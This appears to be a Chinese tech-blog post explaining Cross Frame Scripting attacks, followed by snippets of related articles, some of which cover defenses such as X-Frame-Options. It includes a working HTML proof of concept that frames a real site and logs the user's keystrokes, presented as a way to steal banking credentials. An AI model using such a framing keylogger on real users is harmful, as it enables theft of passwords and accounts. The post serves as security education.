Cross Frame Script 跨框架脚本 攻击

最新推荐文章于 2025-02-05 10:49:16 发布
最新推荐文章于 2025-02-05 10:49:16 发布
阅读量959 收藏
点赞数
本文通过一个简单的HTML实验,展示了CrossFrameScript攻击原理及其潜在危害。利用浏览器框架跨站漏洞,恶意站点能通过主框架代码监视并盗取用户在被包含页面上的输入,如账号密码等敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.youkuaiyun.com/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

               

什么是Cross Frame Script?

很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () { 
   k = window.event.keyCode; 
   window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onload="this.focus();" onblur="this.focus();" cols="100%">
 <frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>

当你在百度的搜索框输入字符时,你会发现左下角的状态栏上出现了你输入的字符。

Cross Frame Script 原理

利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。

Cross Frame Script 危害

一个恶意的站点可以通过用框架包含真的网银或在线支付网站,获取用户账号和密码。

更详细的资料参考,http://www.xs4all.nl/~ppk/js/crosfram.html  

           

给我老师的人工智能教程打call!http://blog.youkuaiyun.com/jiangjunshow
这里写图片描述
跨站脚本攻击(XSS)
凉茶铺的博客
07-26 6147
XSS,为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在一开始的时候,这种攻击的演示案例是跨域的,所以叫"跨站脚本"。但是发展到今天,由于JavaScript的强大功能基于网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,XSS这个名字一直保留下来。(2)页面展示...
Cross Frame Script (跨框架脚本) 攻击
04-11 6919
什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。IE Cross Frame Scripting Restriction Bypass Examplevar keylog=;document.onkeypress = function () {    k = window.event.keyCo
【常见Web应用安全问题】---6、Script source code disclosure
weixin_34128839的博客
12-22 460
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、跨站脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
Cross Frame Scripting
huzk4409的专栏
08-07 2033
有時白箱工具會掃出Client Cross Frame Scripting Attack , 可以在 Header 中加入設定X-FRAME-OPTIONS 但是這樣有些 白箱工具並不知道, 客戶還是會要你改到 Report 看不到, 那怎麼辦呢? 這時候一般會在js中加入 if (top != self) {top.location = self.location;} ...
XFS: Cross Frame Script (跨框架脚本) 攻击
weixin_33736048的博客
01-09 1083
一、Cross Frame Script (跨框架脚本) 攻击什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。&lt;html&gt;&lt;head&gt;&lt;title&gt;IE Cross Frame Scripting Restriction Bypass Example&lt;/title&...
.NET跨框架脚本(XFS)漏洞解决方案
Teemo_2016的博客
07-23 1296
跨框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTML iframe 标记内加载易受攻击的应用程序。攻击者可以使用此漏洞设计点击劫持攻击,以实施钓鱼式攻击、框架探查攻击、社会工程攻击或跨站点请求伪造攻击。 点击劫持攻击的目的是欺骗受害用户在不了解的目标网站上与攻击者选择的 UI 元素交互,然后反过来代表受害者执行特权功能。为达到这一目的,攻击者必须攻击 XFS 漏洞以在 iframe 标记内...
XSS-跨站脚本攻击
m0_61858762的博客
08-17 1528
xss的初步学习
XFS框架脚本漏洞介绍
发哥微课堂
09-18 1164
※ 介绍※ XFS即Cross-FrameScripting跨框架脚本,也叫iFrame注入,了解XFS问题前先来看下面这个小例子,有如下一段html代码。 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <script&g...
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于跨框架脚本和安全
胡争辉
11-06 2147
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于跨框架脚本和安全 [About Cross-Frame Scripting and Security: - 文档] http://msdn2.microsoft.com/en-us/library/ms533028.aspx [jQuery -
跨域 iframe 实例 (Cross-Domain Javascript execution library)
03-31
NULL 博文链接:https://justcoding.iteye.com/blog/1374728
跨站式脚本(Cross-SiteScripting)XSS攻击原理分析第1/4页
10-30
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
Cross Frame 与不同域进行交互
03-28
NULL 博文链接:https://mllongze.iteye.com/blog/1234987
Cross-Frame Scripting漏洞解决---当你这个漏洞解决不了时,不妨看一下
better1166的博客
09-15 2011
使用HP webInspect进行漏洞扫描时,总是出现Cross-Frame Scripting这个漏洞,经过一次次的扫描测试,终于发现解决办法: (1)漏洞扫描报告关于设置X-FRAME-OPTIONS的方法,由于自己用的不是正式的webInspect版本,即使不设置这个,后台扫描时也不会出现这个漏洞,个人觉得这个方法并不是针对所有的扫描设备都管用,但是遇到的时候测试一下,说不定就好了呢; (2)在页面初始化时加上 if(top != self) { ...
Cross-Frame Scripting 漏洞解决
CutelittleBo的博客
01-24 1250
设置 nginx 添加以下指令到 http, server 或 location 中 add_header X-Frame-Options SAMEORIGIN; 参考:https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Frame-Options
frame脚本和安全问题
SilentAcorn的专栏
11-13 1027
仅作一下翻译,原文: About Cross-Frame Scripting and Security 在DHTML中,不同的窗口和框架(frames)中的内容可以通过对象模式用脚本相互交互。但是,由于可以在一个浏览器中通过多个窗口和框架同时显示多个毫不相干的内容,因此制定一定的限制性规则用于确保数据的真实性和保护个人隐私信息就显得很有必要的。 这片文章描述了为什么要添加这些限制性规则,以及这些规
Cross-Frame Scripting漏洞解决】
最新发布
hi_space
02-05 239
(3)最后,经过不下百变的测试,发现这个扫描 与form表单有关系,你的提交事件中只要用到form表单里面的元素,即使是新增,也会报这个漏洞,因为页面是ajax提交的,所以在元素表单设置时,并没有添加,而是在ajax提交之前,将表单加上,获取提交的数据,获取完之后,再将去除,保证提交时也没有form表单。这段代码虽然很少,但是必需,如果不加,即使修改了其它的,也是必报的;(2)在页面初始化时加上。
漏洞修复:Cross-Frame Scripting Medium
CutelittleBo的博客
01-27 1116
描述: A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing
掌握Cross Frame实现跨域交互的核心技巧
首先,Cross Frame通常指的是在Web浏览器中跨文档消息传递的技术。由于同源策略的限制,Web页面中的脚本只能访问与它拥有相同协议、端口(如果是显式指定)和主机的资源。这种策略可以保护用户的数据不受恶意网站的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值